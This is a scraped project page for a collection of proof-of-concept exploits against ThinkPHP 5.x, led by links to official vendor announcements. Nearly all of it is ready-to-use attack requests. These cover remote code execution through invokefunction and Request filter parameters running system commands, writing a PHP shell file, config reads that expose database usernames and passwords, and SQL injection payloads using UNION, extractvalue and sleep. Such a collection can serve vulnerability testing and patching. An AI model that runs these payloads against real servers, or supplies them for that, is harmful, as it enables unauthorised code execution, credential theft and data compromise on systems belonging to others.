Need help with thinkphp-RCE-POC-Collection?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

SkyBlueEternal
850 Stars 214 Forks 24 Commits 1 Opened issues

Description

thinkphp v5.x 远程代码执行漏洞-POC集合

Services available

!
?

Need anything else?

Contributors list

# 346,232
Python
24 commits

thinkphp-RCE-POC

官方公告: 1、https://blog.thinkphp.cn/869075 2、https://blog.thinkphp.cn/910675

POC:

thinkphp 5.0.22

1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username 2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password 3、http://url/to/thinkphp5.0.22/?s=index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=system&vars[1][]=id 4、http://url/to/thinkphp5.0.22/?s=index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=phpinfo&vars[1][]=1

thinkphp 5

5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21

6、http://localhost/thinkphp5.0.21/?s=index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=system&vars[1][]=id 7、http://localhost/thinkphp5.0.21/?s=index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*

8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1 9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd 10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E 11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E 12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=phpinfo&vars[1][]=1 13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=system&vars[1][]=cmd 14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=calluserfuncarray&vars[0]=phpinfo&vars[1][]=1 15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=calluserfuncarray&vars[0]=system&vars[1][]=cmd

未知版本

16、?s=index/\think\module/action/param1/${@phpinfo()} 17、?s=index/\think\Module/Action/Param/${@phpinfo()} 18、?s=index/\think/module/aciton/param1/${@print(THINKVERSION)} 19、index.php?s=/home/article/viewrecent/name/1' header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#" 20、index.php?s=/home/shopcart/getPricetotal/tag/1%27 21、index.php?s=/home/shopcart/getpriceNum/id/1%27 22、index.php?s=/home/user/cut/id/1%27 23、index.php?s=/home/service/index/id/1%27 24、index.php?s=/home/pay/chongzhi/orderid/1%27 25、index.php?s=/home/pay/index/orderid/1%27 26、index.php?s=/home/order/complete/id/1%27 27、index.php?s=/home/order/complete/id/1%27 28、index.php?s=/home/order/detail/id/1%27 29、index.php?s=/home/order/cancel/id/1%27 30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+ 31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1 Content-Disposition: form-data; name="couponid" 1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23(完整版)debug模式

32、(post)public/index.php (data)method=construct&filter[]=system&server[REQUESTMETHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)

33、(post)public/index.php?s=captcha (data) method=construct&filter[]=system&method=get&server[REQUESTMETHOD]=ls -al

thinkphp 5.0.10(完整版)

34、(post)public/index.php?s=index/index/index (data)s=whoami&method=_construct&method&filter[]=system

thinkphp 5.1.* 和 5.2.* 和 5.0.*

35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.